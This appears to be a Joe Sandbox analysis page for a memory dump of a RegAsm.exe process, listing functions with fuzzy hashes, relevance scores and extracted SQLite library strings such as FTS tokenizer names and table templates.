Source File: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 9c05a99f2742c2eb16e35c48ced9828d0de664879a4894588cc5452bea65909a
Instruction ID: 9bd86a61c87db5135224a37be75a9c04084c4b47a1464be72b6b49f31c418ed9
Opcode Fuzzy Hash: 9c05a99f2742c2eb16e35c48ced9828d0de664879a4894588cc5452bea65909a
Instruction Fuzzy Hash: 533138B5D0122C9BDB11DFA1D9897CDBBB8AF08700F1041AAE44CAB280EB719A85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 19C7EF30 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
Instruction ID: b1a1cc7c423b6f048fdefc6a820f54b5f525e9675d2df43c5cffc666bc3feba7
Opcode Fuzzy Hash: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
Instruction Fuzzy Hash: 871108339046626BD3169B29F840B46F794BF44324F098A64F8C99BEA0D771F860CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 19D037E0 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction ID: fdbadcf7e3a2a19e05cbb4db31213f090246a57990749f0c280eb93cb0db940c
Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction Fuzzy Hash: 52E0BF3D004740ABCB225F51EC45E4BBFA6BF88314F495C18F5C561470CBB2A8A5AB41

Uniqueness

Uniqueness Score: -1.00%

Function 19CE3770 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction ID: d594717c842e1f263bdcd958b902176ad0709fffd73d53841078e66098afed38
Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction Fuzzy Hash: 4AE0BF3D004700ABCA225F50ED46E4BBFA6BF88710F495C18F5C521570CB72A864AB41

Uniqueness

Uniqueness Score: -1.00%

Function 19CC5910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 19CC597E

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
API String ID: 0-143322027
Opcode ID: 7c457a86299cf9ccd082efcb7ff02547886819bc9d676932b5e14baefad9d272
Instruction ID: c0ca52ee3e42b06e9411bc8aa710b6b0d46aea306eef3cf28b93d82383b98ea1
Opcode Fuzzy Hash: 7c457a86299cf9ccd082efcb7ff02547886819bc9d676932b5e14baefad9d272
Instruction Fuzzy Hash: 94119ABA500246BFD7109F54DC84F86BBADFF49314F488044F6489B291D7B2B4A4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 19CDD3B0 Relevance: 4.6, APIs: 3, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c81e6d39dfa6c2245fed65545e55543971b83325336cccfd9a47bc5fa6594b
Instruction ID: 3e9408edb80216ac4cc8cf2b6e66c156c343298eba1a8425c832442ea64d8726
Opcode Fuzzy Hash: 25c81e6d39dfa6c2245fed65545e55543971b83325336cccfd9a47bc5fa6594b
Instruction Fuzzy Hash: 22312175A10305ABE704DF69EC85A66B3E9FF48214F088528FA89D3781E771F911CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 19CC55B0 Relevance: 4.6, APIs: 3, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0d2be1db7937906ad5d780168488c68b7468e9cf21d37f219c72fdc08547a55
Instruction ID: 018fe9f259dc7a9b2ca89b6c7d1817da996957f9a3e2bde1cfbd5758e2da06ad
Opcode Fuzzy Hash: a0d2be1db7937906ad5d780168488c68b7468e9cf21d37f219c72fdc08547a55
Instruction Fuzzy Hash: B831AFB6504341AFEB109F25EC85B177BE9EF94344F188868F8868B391D771E950CB61

Uniqueness

Uniqueness Score: -1.00%

Function 19C9E170 Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3fd27aaed022f2b31e84062193eee3112a791fc5677e5ff51a723f25256617
Instruction ID: 855be0720b52adf2216184fefc44f994cf462fd096f621539188ddec445b7f2a
Opcode Fuzzy Hash: aa3fd27aaed022f2b31e84062193eee3112a791fc5677e5ff51a723f25256617
Instruction Fuzzy Hash: 5111E77A610200ABE6019B39EC45F5B77AEEFD4B04F08481CF5C4D3282EA22F511CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19D05660 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 452COMMON

Download Yara Rule

Strings

,%.*s, xrefs: 19D05804, 19D05835
_node, xrefs: 19D0579E
CREATE TABLE x(%.*s INT, xrefs: 19D057CA
Auxiliary rtree columns must be last, xrefs: 19D056B3, 19D058B3

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
API String ID: 0-209218429
Opcode ID: e476168159b87a7410ba90cd89c14648f18b7c2648ebd06695ead6b647f679db
Instruction ID: a6e7c019f08f7cd1c2dbf981674c6a76b15a7980775c2788cbb278d8ee8359f3
Opcode Fuzzy Hash: e476168159b87a7410ba90cd89c14648f18b7c2648ebd06695ead6b647f679db
Instruction Fuzzy Hash: CFF1ED749003419FC7119F26D895B5BBBE8FF44304F8C8828ED8A97681DB36F955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C4CC80 Relevance: 47.7, APIs: 15, Strings: 12, Instructions: 470COMMON

Download Yara Rule

Strings

%06.3f, xrefs: 19C4CE5F
%02d, xrefs: 19C4CE2C, 19C4CE34, 19C4CF27, 19C4CF6F, 19C4CFCE, 19C4CFE9, 19C4D10A
%.3f, xrefs: 19C4D0BF
u, xrefs: 19C4D16D
%02d:%02d:%02d, xrefs: 19C4D12E
%2d, xrefs: 19C4CE27
%.16g, xrefs: 19C4CFB3
%lld, xrefs: 19C4D0EE
%04d-%02d-%02d, xrefs: 19C4CE82
%03d, xrefs: 19C4CF81, 19C4CF8B
%04d, xrefs: 19C4D1CE
%02d:%02d, xrefs: 19C4D080

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %.16g$%.3f$%02d$%02d:%02d$%02d:%02d:%02d$%03d$%04d$%04d-%02d-%02d$%06.3f$%2d$%lld$u
API String ID: 0-1613945299
Opcode ID: e7a1edb169ce5358fe213b8e444bb4666c06c69d3002b3fe6c41249d92e72740
Instruction ID: 7a1acde90d23bf1e548029eedad375073514f97175c62d1e57f9a44aad75b79d
Opcode Fuzzy Hash: e7a1edb169ce5358fe213b8e444bb4666c06c69d3002b3fe6c41249d92e72740
Instruction Fuzzy Hash: 00F1F475A08341ABD310DB64EC45F5BB7EABF85300F9C8A2DF8C597241EA35FA488752

Uniqueness

Uniqueness Score: -1.00%

Function 19CC9120 Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 355COMMON

Download Yara Rule

Strings

_node, xrefs: 19CC9202
CREATE TABLE x(_shape, xrefs: 19CC9268
,%s, xrefs: 19CC9297

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%s$CREATE TABLE x(_shape$_node
API String ID: 0-1242591684
Opcode ID: 0fb68f77c9616603a7847b23b262976ac0d807d31eca7de772bcf03671cfbaab
Instruction ID: f9e470cf7f4a5b3f80da560a0264ba125f5a4fae8f58baf7ea97177684515d63
Opcode Fuzzy Hash: 0fb68f77c9616603a7847b23b262976ac0d807d31eca7de772bcf03671cfbaab
Instruction Fuzzy Hash: 78C1F3B6900341EBD7119F34EC88B57BBB8BF54705F0C4528E9CA86292DB36E515CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19D7B050 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 251COMMON

Download Yara Rule

Strings

%s(%d), xrefs: 19D7B1B3
k(%d, xrefs: 19D7B0A5
program, xrefs: 19D7B2FB
(blob), xrefs: 19D7B26C
%.18s-%s, xrefs: 19D7B192
NULL, xrefs: 19D7B267, 19D7B324, 19D7B325
BINARY, xrefs: 19D7B0D3
%.16g, xrefs: 19D7B217
%c%u, xrefs: 19D7B2C3
%lld, xrefs: 19D7B1DA, 19D7B24C
,%s%s%s, xrefs: 19D7B137
vtab:%p, xrefs: 19D7B283

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 0-900822179
Opcode ID: 955e3ce1ea241aa06d772d9b5763715383d0f15bcc5f4d34e0196f33c837ea06
Instruction ID: 6dfd06c1efc078842851215003d3e0d332fc3c17af3006608b3ac47c57b09aa8
Opcode Fuzzy Hash: 955e3ce1ea241aa06d772d9b5763715383d0f15bcc5f4d34e0196f33c837ea06
Instruction Fuzzy Hash: BC910A749083059BCB08CF54C845B6B77E5BF85308F8C884DFAD58B652D73AE946C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 19C3D820 Relevance: 35.2, APIs: 8, Strings: 12, Instructions: 223COMMON

Download Yara Rule

Strings

unicode61, xrefs: 19C3D90B
fts3_tokenizer, xrefs: 19C3D921
simple, xrefs: 19C3D8A9
fts3tokenize, xrefs: 19C3DA27
porter, xrefs: 19C3D8EE
fts3, xrefs: 19C3D9CA
matchinfo, xrefs: 19C3D970, 19C3D98A
fts4, xrefs: 19C3D9F0
optimize, xrefs: 19C3D9A4
snippet, xrefs: 19C3D93C
offsets, xrefs: 19C3D956
fts4aux, xrefs: 19C3D840

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 0-449611708
Opcode ID: 2fe3a63dc7e2865b2a040194d27b867f128dd60580ba350dba3780e073f756da
Instruction ID: ff018943cbace6a0ea20bcad2d30c7b3d02186b99b8c3de88bacd01d78347acf
Opcode Fuzzy Hash: 2fe3a63dc7e2865b2a040194d27b867f128dd60580ba350dba3780e073f756da
Instruction Fuzzy Hash: 69514D71E0421167E710AA75FD85F577AAC6F0071BF8C4134FD88E6282EB65F715C2A2

Uniqueness

Uniqueness Score: -1.00%

Function 19DB7FB0 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 342COMMON

Download Yara Rule

Strings

winGetTempname2, xrefs: 19DB8094
etilqs_, xrefs: 19DB824C
winGetTempname1, xrefs: 19DB817B
winGetTempname5, xrefs: 19DB8233
winGetTempname4, xrefs: 19DB8355

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 0-2933911573
Opcode ID: c7093298453e73522d32feffaf524b773075d322a09ff80184281a9e5fe921fe
Instruction ID: 1702631b2eee015a7b96f9fe56e021752393bc9f4cf50e8861ceda762130925d
Opcode Fuzzy Hash: c7093298453e73522d32feffaf524b773075d322a09ff80184281a9e5fe921fe
Instruction Fuzzy Hash: B5A1AE759002415FD7009B34EC86BAA7B999F43251F8C4165E88BDF2C2E62BA10FC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 19C42BE0 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 346COMMON

Download Yara Rule

Strings

invalid, xrefs: 19C42E4E
%s at line %d of [%.10s], xrefs: 19C42E78
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C42E69
ORDER BY name, xrefs: 19C42DCC
API call with %s database connection pointer, xrefs: 19C42E5A
